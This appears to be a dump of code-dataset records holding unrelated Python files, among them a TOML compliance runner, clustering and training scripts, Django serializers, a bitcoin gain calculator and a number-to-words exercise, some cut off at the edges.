--------------------------------------------------------------------------------------\ndef _show_summary(counts):\n total = sum(counts.values())\n if total == 0:\n print(colored(\"Deselected all tests!\", fg=\"red\"))\n return\n\n n_passed = colored(\n f\"{counts['pass']} passed\", fg=\"green\" if counts[\"pass\"] else \"red\"\n )\n n_total = f\"{total} total\"\n\n print()\n print(\"Summary: \", n_passed, \", \", n_total, sep=\"\")\n\n\ndef _show_pass(name):\n print(colored(\" PASS \", fg=\"grey\", bg=\"green\"), end=\" \")\n print(colored(name, fg=\"cyan\"))\n\n\ndef _show_fail(name, failed):\n print(colored(\" FAIL \", fg=\"grey\", bg=\"red\"), end=\" \")\n print(colored(name, fg=\"cyan\"))\n\n reason = textwrap.indent(failed.reason, \" \")\n print(colored(reason, fg=\"red\"))\n if failed.details:\n print(textwrap.indent(str(failed.details), \" \"))\n\n\n# Those messy functions above, keeps this function clean.\ndef run_with_reporting(function, checks):\n counts = {\"fail\": 0, \"pass\": 0}\n\n for name, kwargs in checks:\n try:\n function(**kwargs)\n except Failed as e:\n _show_fail(name, e)\n counts[\"fail\"] += 1\n else:\n _show_pass(name)\n counts[\"pass\"] += 1\n\n _show_summary(counts)\n\n # This will be the program's exit code\n if counts[\"fail\"] or sum(counts.values()) == 0:\n return 1\n return 0\n\n\ndef encoder_compliance(encoder, decoder, markers):\n def generate_parameters():\n for toml_file, json_file in get_test_pairs(markers):\n if json_file is None: # need something to encode!\n continue\n yield (\n json_file,\n {\n \"json_file\": json_file,\n \"clean_exit\": toml_file is not None,\n \"encoder\": encoder,\n \"decoder\": decoder,\n },\n )\n\n ensure_executable(encoder)\n ensure_executable(decoder)\n\n return run_with_reporting(test_encoder, generate_parameters())\n\n\ndef decoder_compliance(decoder, markers):\n def generate_parameters():\n for toml_file, json_file in get_test_pairs(markers):\n if toml_file is None: # need something to decode!\n continue\n yield (\n toml_file,\n {\n \"toml_file\": toml_file,\n \"clean_exit\": json_file is not None,\n \"json_file\": json_file,\n \"decoder\": decoder,\n },\n )\n\n ensure_executable(decoder)\n return run_with_reporting(test_decoder, generate_parameters())\n\n\n# --------------------------------------------------------------------------------------\n# CLI argument handling\n# --------------------------------------------------------------------------------------\ndef get_parser():\n parser = argparse.ArgumentParser(prog=\"toml-compliance/run.py\", allow_abbrev=False)\n subparsers = parser.add_subparsers(title=\"commands\")\n\n encoder = subparsers.add_parser(\"encoder\")\n encoder.add_argument(\"target\", action=\"store\", help=\"Encoder to test\")\n encoder.add_argument(\n \"--decoder\",\n action=\"store\",\n help=\"Supporting decoder for testing\",\n required=True,\n )\n encoder.add_argument(\n \"-m\",\n metavar=\"MARKER\",\n dest=\"markers\",\n help=\"Only run tests that match given marker. Can be specified multiple times.\",\n nargs=1,\n )\n\n decoder = subparsers.add_parser(\"decoder\")\n decoder.add_argument(\"target\", action=\"store\", help=\"Encoder to test\")\n decoder.add_argument(\n \"-m\",\n metavar=\"MARKER\",\n dest=\"markers\",\n help=\"Only run tests that match given marker. Can be specified multiple times.\",\n nargs=1,\n )\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n\n if \"target\" not in args:\n parser.print_help()\n sys.exit(1)\n\n # This check isn't super clear at first glance. It works since the 'decoder'\n # subparser does not have a 'decoder' argument.\n should_run_encoder_tests = \"decoder\" in args\n\n if should_run_encoder_tests:\n exit_code = encoder_compliance(args.target, args.decoder, args.markers)\n else:\n exit_code = decoder_compliance(args.target, args.markers)\n\n sys.exit(exit_code)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436177286","text":"from sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#setup values\ndata = pd.read_csv('nci1.csv')\nnumber_of_rows = len(data.index)\nnumber_of_clusters = 5\ncolor_map = []\ncolor_set = ['red','blue','yellow','green','orange','purple']\n\n#Cluster Algorithm\nkmeans = KMeans(n_clusters=number_of_clusters, random_state=0).fit(data.drop(['type'], axis= 1))\nk_cluster = kmeans.labels_\n\n\n\n#set up color map based on cluster\nfor row in range(0,number_of_rows):\n color_map.append(color_set[k_cluster[row]])\n\n\n#Visulization (PCA Algorithm)\npca_3d = PCA(n_components=3)\nPCs_3d = pd.DataFrame(pca_3d.fit_transform(data.drop(['type'], axis= 1)))\n\n#Visualization (t-SNE Algorithm)\ntsne_2d = TSNE(n_components=2, perplexity=3)\nTCs_2d = pd.DataFrame(tsne_2d.fit_transform(data.drop(['type'], axis= 1)))\n\n\n#ax = plt.axes(projection =\"3d\")\n#ax.scatter3D(PCs_3d.loc[:,0],PCs_3d.loc[:,1],PCs_3d.loc[:,2], color = color_map)\nplt.scatter(PCs_3d.loc[:,0],PCs_3d.loc[:,1],c = color_map)\n\n#bx = plt.axes(projection =\"3d\")\n#bx.scatter3D(TCs_3d.loc[:,0],TCs_3d.loc[:,1], TCs_3d.loc[:,2], color = color_map)\n#plt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map)\n\n\nplt.title('PCA Dimension-Representation of Kmeans Clustering')\nplt.show()","sub_path":"Past Files/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107790201","text":"import sys;sys.stdin=open('input2.txt','r')\n\n\ndef tsp(now, next): # now=현재, next=다음\n ret = dp[now][next]\n res = float('INF')\n if next == all: # 만약 마지막 고객까지 끝냈으면 \n return dist[now][N+1] # 그 고객에서부터 집가지의 거리를 반환\n if ret != 0: # 이미 방문했다면 넘어간다\n return ret\n for i in range(1, N+1): # 1번 고객부터 N번 고객까지. \n if next&(1<', max=nIters)\n\n\n #print(\"aaaaaaaaaaaaaaaaa\")\n\n for i, (input, target3D, meta) in enumerate(dataLoader):\n #print(input.size())\n input_var = torch.autograd.Variable(input).float().cuda()\n# target3D_var = torch.autograd.Variable(target3D).float().cuda()\n target3D_var = torch.autograd.Variable(meta).float().cuda()\n\n\n # print(target3D_var)\n\n output = model(input_var)\n# reg = output[opt.nStack]\n\n optimizer.zero_grad()\n loss = mean_squared_error(output, target3D_var)\n loss.backward()\n optimizer.step()\n\n #print(i)\n\n\n\n Loss.update(loss, input.size(0))\n #Acc.update(Accuracy((output.data).cpu().numpy(), (target3D_var.data).cpu().numpy()))\n\n #Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {loss.avg:.6f} | Loss3D {loss3d.avg:.6f} | Acc {Acc.avg:.6f} | Mpjpe {Mpjpe.avg:.6f} ({Mpjpe.val:.6f})'.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, loss=Loss, Acc=Acc, split = split, Mpjpe=Mpjpe, loss3d = Loss3D)\n Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {lossa:} '.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, lossa = Loss.avg, split=split)\n #print(Loss.avg)\n bar.next()\n bar.finish()\n\n if i%500 == 0:\n _checkpoint( model, optimizer)\n\n return Loss.avg #, Acc.avg, Mpjpe.avg, Loss3D.avg\n\n\ndef train(epoch, opt, train_loader, model, criterion, optimizer):\n return step('train', epoch, opt, train_loader, model, criterion, optimizer)\n\ndef val(epoch, opt, val_loader, model, criterion):\n return step('val', epoch, opt, val_loader, model, criterion)\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385945120","text":"from rest_framework import serializers\nfrom .models import *\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ('username','password')\n\n\nclass UserprofileSerializer(serializers.ModelSerializer):\n user = UserSerializer()\n\n class Meta:\n model = Userprofile\n fields = ('user','tel','type','nickname','headportrait')\n\n def to_representation(self, instance):\n ret = super(UserprofileSerializer,self).to_representation(instance)\n ret.pop('user')\n ret['username'] = instance.user.username\n return ret\n\n def create(self,validated_data):\n user = validated_data.pop('user')\n user = User.objects.create_user(**user)\n userprofile = Userprofile.objects.create(user=user,**validated_data)\n return userprofile\n\n def update(self, instance, validated_data):\n if validated_data.get('user'):\n instance.user.__dict__.update(**validated_data)\n userprofile = instance.__dict__.update(**validated_data)\n return userprofile\n","sub_path":"backend/fangdiaocenter/fangdiaocenter/user/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520393217","text":"# program to calculate the gain or loss on bitcoin transactions\r\n# one line of text as header followed by columns of data\r\n# Data file date, +/-coin number, cost$\r\n# 20190402,0.050,205\r\n\r\nimport csv\r\nimport sys\r\nimport os\r\nfrom datetime import date\r\nfrom decimal import *\r\n\r\n\r\ndatafile = \"test.txt\"\r\nwritefile = \"test.csv\"\r\n\r\nPrecision = 8 # number of decimal places in the data\r\n\r\n\r\n\r\ndef SortData():\r\n# separate data into 2 strings\r\n# one with sales and one with buys\r\n\r\n Buy = \"\"\r\n Sell = \"\"\r\n BuyCnt = 0\r\n SellCnt = 0\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n for line in reader:\r\n a1 = line[1]\r\n if a1[0] == '-':\r\n SellCnt += 1\r\n Sell = Sell + str(SellCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\r\n else:\r\n BuyCnt += 1\t\t\r\n Buy = Buy + str(BuyCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\t\r\n\r\n# sort the Buy and Sell strings into descending order by index numbers\r\n# assume the datafile is in chronologic order and you want to use FIFO accounting\r\n# the data would be rearanged from a chronologic order\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\t\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Buy = Temp \t\r\n\t\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','w') as f2:\r\n Temp = \"\"\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Sell = Temp \t\r\n\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','a') as f2:\r\n Temp = \"\"\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n\t\r\n\t\r\n\t\r\nprint(\"\\n\\nBasis-Profit Calculator\")\r\nprint(\"Ed Jordan, 14 Feb 2018\")\r\n\r\nsortFlag = \"\"\r\na = \"\"\r\na2 = \"\"\r\nb = len(sys.argv)\r\nif b > 1:\r\n for c in range(b): \r\n a2 = sys.argv[c]\r\n print(a2)\r\n if a2[0] != '-':\r\n a = a2\r\n\t\t\t\r\n if ((a2 == '-h') or (a2 == '--help') or (a2 == '-H')):\r\n print(\"Data should have one line of buys before the first sale. It can have a line of headers at the top.\")\r\n print(\"Data file needs 3 columns. These are separated by commas or tabs.\")\r\n print(\"Program uses last-in to first-out, LIFO, basis accounting\\n\")\r\n print(\"Data should be in chronological order with buys first before sales.\")\r\n print(\"An 'index out of range' error probably is related to the data file format. \")\r\n print(\"Parameters:\\n -h or --help: help\\n first parameter: datafile name\\nFirstIn-FirstOut: -F\")\r\n print(\"python B2018.py datafile.txt -F\")\r\n print(\"See the README file.\")\r\n sys.exit(1)\r\n\r\n if ((a2 == '-F') or (a2 == '-f')):\r\n sortFlag = \"F\"\r\n\t\t\t\r\nif a != '': \r\n dfile = ''\r\n for s in range(0,len(a)):\r\n if a[s] == '.':\r\n break\r\n dfile = dfile + a[s]\r\n\r\n datafile = dfile + '.txt'\r\n writefile = dfile + '.csv'\r\n print(datafile)\r\n\r\nwith open(datafile,'r') as f1:\r\n with open('work.tmp','w') as f2:\r\n for line in f1:\r\n msg = \"\"\r\n flag = 0\r\n for s in range(0,len(line)):\r\n a = line[s]\r\n if line[0] == '\\n':\r\n break \r\n if a == chr(9):\r\n a = ','\r\n msg = msg + a\r\n elif ((a == ',') and (flag == 1)):\r\n continue\r\n elif a == '$':\r\n flag = 1\r\n continue\r\n elif ((a == ',') and (flag == 1)):\r\n continue\r\n elif a == ' ':\r\n continue\r\n else:\r\n msg = msg + a\r\n \r\n f2.write(msg) \r\n f2.close\r\n\r\n\t\r\nif sortFlag == 'F':\r\n print(\"Option -F\")\r\n SortData() \r\n\r\n\r\n\t\r\ndef GetDecimal(n3): # each piece of data should have the correct number of decimals\r\n cnt = 0\r\n for s in range(0,len(n3)):\r\n a = n3[s]\r\n cnt = cnt + 1\r\n if a == '.':\r\n cnt = 0\r\n \r\n return cnt\r\n\t\r\n\t\r\ndef AdjFlag(n1,n2,Prec):\r\n flag=0\t\t\r\n \r\n# 3 outcomes for addition of sold coins with bought coins\r\n# negative - more sold than bought\r\n# positive - fewer sold than bought\r\n# zero - equal number sold and bought $flag 0, 1, or 2\r\n\r\n a = \"0.\"\r\n for s in range(0,Prec):\r\n a = a + \"0\"\r\n\t\t\r\n a = a + \"5\"\r\n a = Decimal(a)\t\r\n pr1 = float(n1)\r\n pr2 = float(n2) \r\n\t\r\n if pr1 < a: # decimal point + 1 ?\r\n pr1 = 0\r\n if pr2 < a:\r\n pr2 = 0\r\n \r\n pr3 = pr1 - pr2\r\n\r\n if pr3 == 0:\r\n flag = 0\r\n if pr3 > 0:\r\n flag = 2\r\n if pr3 < 0:\r\n flag = 1\r\n\r\n# if the flag is zero. The amounts of the coins are equal\r\n# the price of the bought coins == the basis of the sold coins\r\n# both the bought coin row and the sold coin row can be deleted\r\n# from the data file\r\n\r\n return flag\r\n\r\ndef findRecordIndex():\r\n inx = 1\t\t\t\t\t# starting record\r\n try:\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt = 0\r\n for line in reader:\r\n cnt=cnt+1\r\n n1 = line[1]\r\n if n1[0] == '-':\r\n inx = cnt\r\n break\r\n f1.close\r\n inx = inx -1\r\n except IndexError:\r\n inx = 0\r\n return inx\r\n\r\ndef findListA(inx):\r\n dataLista = \"\"\r\n f1 = open('work.tmp', 'r')\r\n cnt = 1\r\n c1 = \"\"\r\n for line in f1: \r\n c1 = c1 + str(line) \r\n cnt = cnt + 1 \r\n if cnt == inx:\r\n f1.close\r\n break\r\n \r\n dataLista = c1\r\n return dataLista\r\n\r\ndef findListB(inx):\r\n dataListb =\"\"\r\n inx = inx +2\r\n f1 = open('work.tmp', 'r')\r\n cnt = 0\r\n c1 = \"\"\r\n for line in f1:\r\n cnt = cnt +1 \r\n if cnt >= inx:\r\n c1 = c1 + str(line) \r\n \r\n f1.close\r\n dataListb = c1\r\n return dataListb\r\n\r\ndef saveData(html):\r\n csv.register_dialect('escaped', delimiter = ' ', escapechar=\"\\\\\", quoting=csv.QUOTE_NONE)\r\n with open(writefile, 'a', newline='') as f1:\r\n linewriter = csv.writer(f1, dialect='escaped')\r\n linewriter.writerow(html)\r\n f1.close\r\n return\r\n\r\ndef writeData(dataLista, html, dataListb):\r\n f1 = open('work.tmp','w')\r\n f1.write(dataLista)\r\n f1.write(html)\r\n f1.write(dataListb)\r\n f1.close\r\n return\r\n\r\ndef makePositive(x): # string x is returned positive\r\n c = x\r\n a = \"\"\r\n for b in range(len(c)):\r\n if c[b] != '-':\r\n a = a + c[b]\r\n return a\r\n\r\ndef adjLength(x,y): # limit string to 2 decimal digits for currency.\r\n # y is the number of digits after the decimal point\r\n cnt=0\r\n a = \"\"\r\n e = \"\"\r\n c = \"\"\r\n d = 0\r\n flag = 0 # flag for the decimal point\r\n flag2 = 0 # flag for a leading zero in e\r\n for b in range(len(x)):\r\n f = x[b]\r\n if flag == 1:\r\n cnt = cnt + 1\r\n if cnt > y:\r\n d = int(f)\r\n break\r\n e = e+f\r\n if f == '.':\r\n flag = 1\r\n if flag == 0:\r\n c = c + f\r\n\t\t\t\t\t\r\n if d > 4: \r\n flag=0\r\n cnt = 0\r\n\r\n for b in range(len(e)):\r\n if e[b] != \"0\":\r\n flag = 1\r\n if e[b] == \"0\":\r\n if flag == 0:\r\n flag2 = flag2+1 # count leading zeros\r\n else:\r\n cnt = cnt+1 # digits after leading 0\r\n\r\n# int drops all leading zeros\r\n# if e is all 9s - they become zeros and c is incremented\r\n# if e is all 0s - it becomes 1 and we drop one leading 0\r\n# if e after the leading zeros is all 9s we also drop 1 0\r\n\r\n pr = \"\"\r\n pr1= \"\"\r\n if cnt > 0:\r\n for b in range(cnt):\r\n pr = pr + \"9\"\r\n pr1 = pr1 + \"0\"\r\n \r\n pr = int(pr)\r\n e = int(e)\r\n \r\n if e == pr:\r\n if cnt < y:\r\n e = \"1\"+pr1\r\n flag2 = flag2 -1\r\n if cnt == y:\r\n e = pr1\r\n c = int(c)\r\n c = c + 1\r\n c = str(c)\r\n else:\r\n e = e + 1\r\n e = str(e)\r\n for b in range(flag2):\r\n e = '0'+e\r\n\r\n if cnt == 0:\r\n e = 1\r\n flag2 = flag2-1\r\n e = str(e)\r\n if flag2 > 0: # add leading zeros\r\n e = str(e)\r\n for b in range(flag2):\r\n e = \"0\"+e\r\n\r\n a = c +\".\"+e \r\n n = y - len(e)\r\n\t\r\n if n > 0:\r\n for b in range(n):\r\n a = a + \"0\"\t\t# add trailing zeros\r\n \r\n return a \r\n \r\ndef adjValue(x): # adj value of digital x and make string\r\n if x == 0:\r\n a = \"0.00\"\r\n else:\r\n a = str(x) \r\n\r\n return a \r\n\r\n# Save work.tmp first to the spreadsheet. This followed by the program output\t\r\nmsg = \"\"\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n\t\r\n# write first row of the spreadsheet\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = \"saleDate,number,cost,unitPrice,proceeds,buyDate,profit,gain\"\r\nsaveData(msg)\r\n\r\n# d1 is the date of the purchase\r\n# d2 is the date of the sale\r\n# gain is the long or short term nature of the sale\r\n# p1 is the price of the purchased coins\r\n# p2 is the price of the sale of coins and it is negative\r\n# p3 is the price per coin in dollars purchased\r\n# p4 is the price per coin in dollars sold\r\n# n1 is the number of coins bought\r\n# n2 is the number of coins sold.\r\n\r\n\r\ninx = 1\r\nwhile inx > 0:\r\n \r\n d1=\"\"\r\n d2=\"\"\r\n n1=\"\"\r\n n2=\"\"\r\n p1=\"\"\r\n p2=\"\"\r\n p3=\"\"\r\n p4=\"\"\r\n\r\n cnt2 = 0\r\n flag = 0\r\n dataListA = \"\"\r\n dataListB = \"\"\r\n\r\n inx = findRecordIndex() \r\n if inx < 1:\r\n break\r\n \r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt=0\r\n \r\n for line in reader:\r\n cnt=cnt+1\r\n if cnt == inx:\r\n d1 = line[0]\r\n n1 = line[1]\r\n p1 = line[2]\r\n if cnt == inx+1:\r\n d2 = line[0]\r\n n2 = line[1]\r\n p2 = line[2]\r\n break\r\n f1.close\r\n\t\t\r\n Precision = GetDecimal(n1) # set decimal number based on data \r\n p1 = makePositive(p1)\r\n p2 = makePositive(p2) \r\n n1 = makePositive(n1)\r\n n2 = makePositive(n2)\r\n\t\r\n yr1 = d1[0]+d1[1]+d1[2]+d1[3] \r\n yr2 = d2[0]+d2[1]+d2[2]+d2[3] \r\n if d1[4] == 0:\r\n mo1 = d1[5] \r\n else:\r\n mo1 = d1[4] + d1[5]\r\n if d1[6] == 0:\r\n da1 = d1[7]\r\n else:\r\n da1 = d1[6] + d1[7] \r\n if d2[4] == 0:\r\n mo2 = d2[5] \r\n else:\r\n mo2 = d2[4] + d2[5]\r\n if d2[6] == 0:\r\n da2 = d2[7]\r\n else:\r\n da2 = d2[6] + d2[7]\r\n\r\n yr1 = int(yr1)\r\n mo1 = int(mo1)\r\n da1 = int(da1)\r\n yr2 = int(yr2)\r\n mo2 = int(mo2)\r\n da2 = int(da2) \r\n\r\n date1 = date(yr1,mo1,da1)\r\n date2 = date(yr2,mo2,da2)\r\n date3 = abs(date2-date1)\r\n date3 = date3.days\r\n if date3 > 365:\r\n gain = \"L\"\r\n else:\r\n gain = \"S\"\r\n\r\n# the basis for the sale is the share of the coins purchased\r\n# is #sold/#bought x price of the whole purchase\t\r\n \r\n p1 = Decimal(p1) # cost of purchase\r\n p2 = Decimal(p2) # proceeds of sale \r\n n2 = Decimal(n2) # number sold\r\n n1 = Decimal(n1) # number bought\r\n p3 = Decimal(p1/n1) # price per coin bought\r\n p4 = Decimal(p2/n2) # price per coin sold\r\n p4 = float(p4)\r\n p4 = Decimal(p4)\r\n p3 = float(p3)\r\n p3 = Decimal(p3)\r\n\t\r\n basis = p3*n2 \r\n profit = p2 - basis\r\n\t\r\n basis = adjValue(basis)\r\n basis = adjLength(basis,2)\r\n basis = Decimal(basis)\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n profit = Decimal(profit)\r\n\t\t\r\n\t\t\r\n# the price obtained for the coins sold minus the basis = gain/loss p2 = proceeds of sale\r\n# remaining coins unsold are n1 - n2 \r\n# the price per coin purchased does not change. p3 and p4 don't change\r\n\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n newNumCoins = n1-n2\r\n newBasis = newNumCoins*p3\r\n newBasis = adjValue(newBasis)\r\n newNumCoins = str(newNumCoins)\r\n basis = adjValue(basis)\r\n\r\n newBasis = adjLength(newBasis,2)\r\n\r\n profit = adjLength(profit,2)\r\n newNumCoins = adjLength(newNumCoins,Precision)\r\n \r\n flag = AdjFlag(n1,n2, Precision)\r\n \r\n dataListA = findListA(inx)\r\n dataListB = findListB(inx)\r\n\r\n if flag == 0: # equal number sold and bought\r\n n2 = str(n2)\r\n p3 = adjValue(p3)\r\n p3 = adjLength(p3,2)\r\n n2 = adjLength(n2,Precision)\r\n p1 = adjValue(p1)\r\n p2 = adjValue(p2)\r\n p1 = adjLength(p1,2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"\r\n msg = msg+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\r\n saveData(msg)\r\n msg = '\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\r\n if flag == 2: # fewer number sold than bought\r\n n2 = str(n2)\r\n profit = str(profit)\r\n n2 = adjLength(n2,Precision)\r\n p2 = adjValue(p2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\t\r\n saveData(msg)\r\n msg = d1+','+newNumCoins+','+newBasis+'\\n'\r\n\r\n writeData(dataListA,msg,dataListB)\r\n \r\n if flag == 1: # greater number sold than bought - carry some over unsold coins to the next sale\r\n # n1 becomes the number sold and the proceeds are n1*p4 for sale proceeds\r\n\t\t # p1 is the basis of the sold coins \r\n \r\n nn1 = n2 - n1\r\n newBasis = nn1*p4\r\n np2 = n1*p4\r\n nn1 = str(nn1)\r\n nn1 = makePositive(nn1)\r\n nn1 = adjLength(nn1,Precision)\r\n profit = np2-p1 \r\n np2 = adjValue(np2)\r\n np2 = adjLength(np2,2)\r\n p1 = adjValue(p1)\r\n p1 = adjLength(p1,2)\r\n n1 = str(n1) \r\n n1 = adjLength(n1,Precision) \r\n p2 = str(p2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n profit=adjValue(profit)\r\n profit=adjLength(profit,2)\r\n newBasis = adjValue(newBasis)\r\n newBasis=adjLength(newBasis,2)\r\n msg = d2+\",-\"+n1+\",\"+p1+\",\"+p4+\",\"+np2+\",\"+d1+\",\"\r\n msg = msg +profit+\",\"+gain \r\n saveData(msg)\r\n \r\n msg = d2+',-'+nn1+',-'+newBasis+'\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\t\t\r\n\r\n\t\t\r\n# add the work.tmp residual file to the spreadsheet\r\n# then delete the work.tmp file\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = 'Residual,Unsold,Items'\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n \r\n\t\t\r\nos.remove('work.tmp')\r\n\r\nprint('done')\r\nsys.exit(0)\r\n","sub_path":"B2019b.py","file_name":"B2019b.py","file_ext":"py","file_size_in_byte":19054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"370501147","text":"\"\"\"\n1305. Integer to English Words\nConvert a non-negative integer to its english words representation. Given input is guaranteed to be less than 2^31 - 1.\n\n样例\n123 -> \"One Hundred Twenty Three\"\n12345 -> \"Twelve Thousand Three Hundred Forty Five\"\n1234567 -> \"One Million Two Hundred Thirty Four Thousand Five Hundred Sixty Seven\"\n\"\"\"\nclass Solution:\n \"\"\"\n @param num: a non-negative integer\n @return: english words representation\n \"\"\"\n def numberToWords(self, num):\n # Write your code here\n n1 = [\"\", \"One\", \"Two\", \"Three\", \"Four\", \"Five\",\n \"Six\", \"Seven\", \"Eight\", \"Nine\", \"Ten\",\n \"Eleven\", \"Twelve\", \"Thirteen\", \"Fourteen\", \"Fifteen\",\n \"Sixteen\", \"Seventeen\", \"Eighteen\", \"Nineteen\"]\n n2 = [\"\", \"Ten\", \"Twenty\", \"Thirty\", \"Forty\",\n \"Fifty\", \"Sixty\", \"Seventy\", \"Eighty\", \"Ninety\"]\n n3 = ['Hundred', '', 'Thousand', 'Million', 'Billion']\n res = ''\n index = 1\n if num == 0:\n return 'Zero'\n elif 0 < num < 20:\n return n1[num]\n elif 20 <= num < 100:\n return n2[num // 10] + ' ' + n1[num]\n else:\n while num != '':\n digit = int(str(num)[-3::])\n num = (str(num)[:-3:])\n i = len(str(digit))\n r = ''\n while True:\n if digit < 20:\n r += ' ' + n1[digit] + ' '\n break\n elif 20 <= digit < 100:\n r += ' ' + n2[digit // 10]\n elif 100 <= digit < 1000:\n r += ' ' + n1[digit // 100] + ' ' + n3[0]\n digit = digit % (10 ** (i - 1))\n i -= 1\n r = r.strip()\n if digit != 0 or i >= 1:\n r += ' '+n3[index]+' '\n index += 1\n r += res\n res = r\n return res.strip()","sub_path":"算法 - 其他/字符串处理/1305.Integer to English Words.py","file_name":"1305.Integer to English 